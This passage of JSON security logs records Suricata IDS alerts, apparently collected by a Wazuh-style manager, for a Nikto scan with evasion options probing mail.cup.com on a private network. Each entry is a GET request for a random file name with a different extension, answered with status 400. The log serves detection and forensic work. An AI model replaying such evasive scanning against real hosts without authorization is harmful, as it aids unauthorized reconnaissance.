Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.549896+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":67,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.107615","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.549896+0000\",\"flow_id\":203104692363407,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47070,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-jp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.549896+0000","flow_id":"203104692363407.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47070","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-jp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.553708+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":68,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.109166","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.553708+0000\",\"flow_id\":1482309161872368,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47072,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.es\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.553708+0000","flow_id":"1482309161872368.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47072","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.es","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.556583+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":69,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.110703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.556583+0000\",\"flow_id\":993915545746050,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47074,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.utf8\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.556583+0000","flow_id":"993915545746050.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47074","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.utf8","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.570703+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":70,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.112242","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.570703+0000\",\"flow_id\":304066488610493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47076,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php=\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.570703+0000","flow_id":"304066488610493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47076","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php=","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.575638+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":71,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.113781","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.575638+0000\",\"flow_id\":1484675688873005,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47078,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dk\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.575638+0000","flow_id":"1484675688873005.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47078","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dk","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.578131+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":72,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.115318","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.578131+0000\",\"flow_id\":1753841289317738,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47080,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php4\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.578131+0000","flow_id":"1753841289317738.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47080","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php4","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.581866+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":73,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.116859","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.581866+0000\",\"flow_id\":1.17482386324625e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47082,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.sh\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.581866+0000","flow_id":"1174823863246250.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47082","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.sh","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.585321+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":74,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.118400","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.585321+0000\",\"flow_id\":1629124028984059,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47084,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.585321+0000","flow_id":"1629124028984059.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47084","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.588333+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":75,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.119939","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.588333+0000\",\"flow_id\":1.72249232303402e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47086,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jse\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.588333+0000","flow_id":"1722492323034020.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47086","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jse","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.590216+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":76,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.121482","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.590216+0000\",\"flow_id\":479451478163037,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47088,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nlm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.590216+0000","flow_id":"479451478163037.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47088","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nlm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.592132+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":77,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.123019","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.592132+0000\",\"flow_id\":88759778018679,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47090,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.printer\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.592132+0000","flow_id":"88759778018679.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47090","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.printer","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.594670+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":78,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.124562","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.594670+0000\",\"flow_id\":560166798495674,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47092,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.1\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.594670+0000","flow_id":"560166798495674.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47092","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.1","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.599159+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":79,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.126095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.599159+0000\",\"flow_id\":1422785210098109,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47094,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pwd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.599159+0000","flow_id":"1422785210098109.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47094","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pwd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.601252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":80,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.127634","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.601252+0000\",\"flow_id\":1543190323276216,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47096,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp866\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.601252+0000","flow_id":"1543190323276216.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47096","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp866","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.603136+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":81,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.129177","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.603136+0000\",\"flow_id\":1566365966807384,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47098,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ida\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.603136+0000","flow_id":"1566365966807384.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47098","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ida","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.612252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":82,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.130716","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.612252+0000\",\"flow_id\":1249779632453529,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47100,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.wwwacl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 